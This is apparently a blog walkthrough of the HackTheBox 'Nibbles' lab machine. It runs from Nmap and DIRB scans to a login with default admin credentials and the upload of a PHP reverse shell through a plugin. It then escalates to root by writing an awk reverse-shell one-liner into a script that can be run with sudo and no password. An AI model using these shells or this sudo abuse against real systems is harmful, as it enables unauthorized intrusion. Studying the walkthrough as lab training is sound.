HacktheBox: Nibbles

My first step was to run Nmap against the machine to identify running services.

# Nmap 7.80 scan initiated Mon Nov  2 13:11:02 2020 as: nmap -p- -sV -sC -O -oN scan
Nmap scan report for
Host is up (0.022s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov  2 13:12:43 2020 -- 1 IP address (1 host up) scanned in 100.56 seconds

As you can see both SSH and port 80 were open. I decicded to first browse to port 80, where i was greeted with a page containing the text “Hello World!” viewing the page source showed there was a hidden comment:

<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

I browsed to the nibbleblog directory and was greeted with the following:

I then ran DIRB against the webserver to find hidden directories.

kali@kali:~$ dirb /usr/share/wordlists/dirb/big.txt 

DIRB v2.22    
By The Dark Raver

START_TIME: Mon Nov  2 13:17:36 2020
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt


GENERATED WORDS: 20458                                                         

---- Scanning URL: ----
+ (CODE:200|SIZE:4628)                                                                                                                                                                               
==> DIRECTORY:                                                                                                                                                                                       
==> DIRECTORY:                                                                                                                                                                                     
==> DIRECTORY:                                                                                                                                                                                   
==> DIRECTORY:                                                                                                                                                                                     
==> DIRECTORY:                                                                                                                                                                                      
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
END_TIME: Mon Nov  2 13:24:51 2020

From the output you can see that there were multiple directories found. Some of them even having directory listings enabled. The one I found of interest was the admin directory. Browsing to this displayed an admin login page. From here I was able to login using common credentials found via Google. (admin:nibbles)

I then discovered theĀ following website which describes the process of uploading a reverse shell via the image upload plugin. So i modified kali’s default php reverse shell from “/usr/share/webshells/php/php-reverse-shell.php” with my VPN tunnel IP address and to port 2600. I then browsed to Plugins, then the “My Image” plugin configuration page. And uploaded the shell using the form on that page.


The shell then uploads to

I started a netcat listener on port 2600 and browsed to that page to execute the reverse shell.

root@kali:/home/kali/Documents/nibbles# nc -nvlp 2600
listening on [any] 2600 ...                                                                                                                                                                                                                                                                                                                                                                                                                                                                
connect to [] from (UNKNOWN) [] 56942                                                                                                                                                                                                                                                                                                                                                                                                                                
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux                                                                                                                                                                                                                                                                                                                                                                                
 14:43:24 up 6 min,  0 users,  load average: 0.00, 0.02, 0.00                                                                                                                                                                                                                                                                                                                                                                                                                              
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT                                                                                                                                                                                                                                                                                                                                                                                                                        
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)                                                                                                                                                                                                                                                                                                                                                                                                                                   
/bin/sh: 0: can't access tty; job control turned off                                                                                                                                                                                                                                                                                                                                                                                                                                       $ cd home
$ ls 
c$ d nibbler
$ ls
$ cat user.txt

As you can see from the output. The reverse shell worked successfully and i was able to capture the user flag.

The enxt step was to esclate privilages to become root. This ended up being very simple. I ran the command sudo -L to see which commands can be run under sudo:

sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

You can see from the output that /home/nibbler/personal/stuff/monitor.sh can be run using sudo without a password. As this is in the nibbler user directory it means we can write to this file. I created the /home/nibbler/personal/stuff/ directory then created a monitor.sh file with the following contents:

#! /bin/bash
awk 'BEGIN {s = "/inet/tcp/0/"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

This creates a reverse shell to my kali machine on port 2667. I created a netcat listener on that port then ran monitor.sh under sudo:

cd /home/nibbler/personal/stuff
sudo ./monitor.sh
root@kali:/home/kali/Documents/nibbles# nc -nvlp 2667
listening on [any] 2667 ...

connect to [] from (UNKNOWN) [] 39924
shell>cat /root/root.txt

As you can see in the output. The reverse shell was successfully generated and I was able to capture the root flag.

Leave a Reply

Your email address will not be published. Required fields are marked *